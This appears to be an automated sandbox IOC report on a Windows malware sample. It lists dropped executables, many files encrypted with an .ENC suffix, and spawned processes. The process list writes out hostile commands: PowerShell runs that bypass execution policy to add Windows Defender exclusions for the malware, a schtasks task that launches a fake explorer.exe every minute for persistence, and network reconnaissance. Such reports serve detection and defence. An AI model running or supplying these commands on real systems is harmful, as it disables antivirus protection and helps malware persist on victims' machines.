IOC Report
8svMXMXNRn.exe

loading gif

Files

File Path
Type
Category
Malicious
8svMXMXNRn.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\TrojanXD.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\script.vbs
Unicode text, UTF-8 text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\voosiq.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\explorer.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
\Device\ConDrv
ISO-8859 text, with CRLF, LF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xde048b76, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_8a67a53847f1550bba47f83cc7f50ab9fda1622_30d98452_79ae1923-2aab-47ba-a2dd-a54311f75107\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF666.tmp.dmp
Mini DuMP crash report, 16 streams, Sun Oct 13 17:09:14 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF83B.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87B.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\.curlrc.ENC
data
dropped
C:\Users\user\3D Objects\desktop.ini.ENC
data
dropped
C:\Users\user\AppData\Local\.curlrc.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.log.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCK.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.log.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCK.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\MANIFEST-000001.ENC
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.ENC
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journal.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENT.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOCK.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.ENC
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin.ENC
data
dropped
C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.ENC
data
dropped
C:\Users\user\AppData\Local\IconCache.db.ENC
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bootstrapper.exe.log
CSV text
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini.ENC
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\INetCache\8FGZXQXH\configuration[1].xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb
Extensible storage engine DataBase, version 0x620, checksum 0x30cb0b1b, page size 8192, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk
data
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log
data
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs
data
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs
data
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt (copy)
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt.~tmp
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml (copy)
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml.~tmp
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\.ses.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0164771190.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0196354653.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0409654664.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0450125302.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0518291756.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0653671941.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\0982390758.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1033868256.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1141274626.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1206337459.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1237160943.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1239919175.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1287572840.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1422339599.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\1927994670.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2103954313.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2118371548.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2168651637.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2265332024.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2385760553.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2567238426.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2585558601.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2669049752.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\2843307863.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\3024948866.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\3322604653.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\3476888679.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\3643399760.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\4478492829.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\4676012234.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\4736274156.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\4941266003.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\4965367024.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5064077962.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5281104033.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5491630718.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5622580005.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5713452101.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\5809130301.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6092905029.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6109303877.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6183211589.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6213653276.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6329227256.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6422942404.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6577738837.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\6750529025.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7011884383.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7155756679.ENC
Clarion Developer (v2 and above) memo data
dropped
C:\Users\user\AppData\Local\Temp\7216804956.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7245361316.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7457734050.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7676687441.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\7847944919.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8182259827.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8200946536.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8351801105.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8492240360.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8552718761.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8784112376.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8886835349.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8975065801.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\8995528179.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9217021447.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9275373402.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9329238007.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9422479677.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9655434068.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9659692161.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\9925478147.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\AdobeARM.log.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\DISCORD
JSON data
dropped
C:\Users\user\AppData\Local\Temp\Hamster.mp3
ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qo2vp3v.mzr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wfuorws.z4t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40vrje1z.nnv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dav3qlo.ebr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpusphmk.my3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzbnfcle.yo4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddv2y5.ik1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4wdzxz5.5mk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxh04bci.kh1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqf0arbo.jve.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1walyv5.xch.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvpcdrn1.c4g.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgitn5y1.2yy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yc2welzi.yun.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yppo0orq.2m3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpoglvcm.ugz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\user.bmp.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\chrome.exe.ENC
data
dropped
C:\Users\user\AppData\Local\Temp\cv_debug.log.ENC
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Temp\dbghelp.dll.ENC
data
modified
C:\Users\user\AppData\Local\Temp\picture.png
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 624x350, components 3
dropped
C:\Users\user\AppData\Local\_curlrc.ENC
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:10:00 2024, mtime=Sun Oct 13 16:10:00 2024, atime=Sun Oct 13 16:10:00 2024, length=78848, window=hide
dropped
C:\Users\user\NTUSER.DAT.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\_curlrc.ENC
data
dropped
C:\Users\user\ntuser.dat.LOG1.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\ntuser.dat.LOG2.ENC
Non-ISO extended-ASCII text, with no line terminators
dropped
C:\Users\user\ntuser.ini.ENC
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\Harddisk0\DR0
data
dropped
There are 227 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\8svMXMXNRn.exe
"C:\Users\user\Desktop\8svMXMXNRn.exe"
malicious
C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
"C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe"
malicious
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
"C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
malicious
C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
"C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate true
malicious
C:\Windows\System32\cmd.exe
"cmd" /c ipconfig /all
malicious
C:\Windows\System32\ipconfig.exe
ipconfig /all
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Users\user\AppData\Roaming\explorer.exe
"C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
"C:\Users\user\AppData\Roaming\explorer.exe"
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Users\user\AppData\Local\Temp\voosiq.exe
"C:\Users\user\AppData\Local\Temp\voosiq.exe"
malicious
C:\Users\user\AppData\Local\Temp\TrojanXD.exe
"C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
malicious
C:\Windows\System32\cmd.exe
